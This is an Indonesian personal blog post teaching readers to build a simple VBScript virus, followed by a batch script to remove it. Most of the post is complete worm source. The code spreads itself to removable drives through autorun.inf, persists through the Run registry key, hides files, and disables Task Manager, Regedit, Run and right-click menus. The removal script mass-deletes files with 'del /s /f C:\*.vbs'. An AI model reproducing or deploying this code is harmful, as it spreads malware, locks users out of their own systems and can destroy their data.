fachrur's blog...

Sumpek kena virus...? sama! saya juga! hehe..

Tips kali ini akan membahas pembuatan sebuah virus sederhana yang lengkap dengan pencegahannya. Pada tips kali ini, aplikasi yang digunakan tidak perlu menggunakan software canggih.. cukup dengan menggunakan aplikasi text editor sederhana tapi mumpuni (dalam hal ini, penulis menggunakan aplikasi Notepad bawaan Windows).. he..

Untuk virus, penulis menggunakan contoh coding sederhana sebuah virus lalu penulis lanjut dengan membahas penghapusan virus tersebut melalui command prompt. Semua coding pada tips ini berhasil dibuat melalui aplikasi text editor (notepad) dan bekerja pada Windows XP SP2. Baik coding virus dan coding penghapusan, berjalan dengan sukses tanpa ada aral melintang. Untuk mengembalikan fungsi Windows yang dimatikan oleh coding virus, silahkan gunakan aplikasi utilitas seperti WinBoost atau WinXP Manager (atau keduanya) maupun aplikasi utilitas lainnya karena terlalu banyak manipulasi registry yang dilakukan oleh coding virus ini.. penulis sudah sangat mengantuk untuk membahas pengembalian fitur Windows.. hehe.. mungkin akan dibahas di lain kesempatan.





Penulis dan sumber-sumber penulis tidak bertanggung jawab dan/atau tidak dapat dimintakan pertanggung jawaban atas kerusakan yang timbul sebagai akibat dari penerapan tips ini. Resiko menerapkan tips ini adalah tanggungan pribadi!!



Berikut adalah contoh coding dari virus Rangga-Zay yang coding-nya saya temukan pada sebuah blog. Copy-Paste coding berikut lalu ubah baris yang dicetak tebal atau cetak miring:


‘//–Awal dari coding, Memaksa Windows Untuk Mengabaikan Pesan Error Lalu Lanjut Mengeksekusi Baris Perintah Selanjutnya–//
on error resume next

’//–Dim Kata Kunci Berikut–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,namavirus,nt,check,sd

‘//–Membuat Sebuah File Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe namavirus.ext”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Membuat Sebuah File Induk Virus Pada Folder Windows (contoh: C:\WINDOWS)-//
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- namavirus.ext “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- namavirus.ext”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- namavirus.ext “)
tf.attributes = 39

‘//–Membuat File Autorun Yang Akan Dieksekusi Secara Otomatis–//
‘Menggandakan diri apabila tipe drive adalah 1 dan 2 (removable) termasuk disket
for each flashdrive in fs.drives

‘//–Melakukan Pemeriksaan Tipe Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Perintah Untuk Menyebarkan File Virus Ke Drive Lain Dengan Tipe Drive 1, 2, Atau Dengan Path A:–//
set tf=fs.getfile(flashdrive.path &”\namavirus.ext “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\namavirus.ext “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\namavirus.ext “)
tf.attributes = 39

‘//–Memanggil File Autorun Setup Information Untuk Di Masukkan Ke Dalam File Autorun–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set namavirus = createobject(”WScript.Shell”)

‘//–Menambahkan Pesan Pada Title Bar Internet Explorer–//
namavirus.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Masukkan pesan anda disini “

‘//–Membuat File Dengan Attribut Hidden Tidak Ditampilkan Melalui Windows Explorer–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0?, “REG_DWORD”

‘//–Menghilangkan Menu Find, Folder Options, Run, dan Mematikan Regedit serta Task Manager–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”

‘//–Mematikan Fungsi Klik Kanan–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”

‘//–Memunculkan Pesan Setiap Windows Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Masukkan pesan anda disini.”

‘//–Membuat Windows Untuk Selalu Mengeksekusi Virus Pada Saat Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- namavirus.ext “

‘//–Mengubah Registered Owner Dan Organization–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Masukkan Teks Disini”
namavirus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Masukkan Teks Disini”

‘//–Melakukan Perulangan Fungsi Sleep–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

‘Akhir dari coding


Simpan dengan nama file bebas tapi ekstensinya harus ".VBS"; agar bisa terbaca dan tereksekusi oleh Windows Scripting Host. Caranya File\Save As.... lalu pada bagian "Save as type" pilih “All Files (*.*)" dan masukkan ekstensi file (.vbs)
Klik [Save]



Sekarang, kita akan membuat penghapusan virus tersebut:

Buka aplikasi text editor (Notepad, Wordpad, dll..)
Copy-Paste coding berikut pada text editor anda

echo Anda yakin mau mengeksekusi penghapusan?
PAUSE
del /s /f C:\*.vbs
echo Penghapusan tahap pertama selesai, penghapusan tahap kedua akan dimulai...
PAUSE
del /f /q C:\*.vbs
echo Penghapusan selesai. Silahkan restart komputer anda.
PAUSE
EXIT

Simpan file tersebut dengan nama file bebas tapi ekstensinya harus ".bat"
Jalankan file tersebut dan tunggu hingga selesai
Restart komputer


O iya, path "C:\" bisa diganti dengan path menuju drive apa saja (A-Z) serta ekstensi file bisa diganti sesuai dengan ekstensi virus. Hati-hati ketika mengubah ekstensi penghapusan menjadi ".exe" karena semua file aplikasi pada drive tersebut akan terhapus tanpa kecuali!

Selamat mencoba! Trims.

Share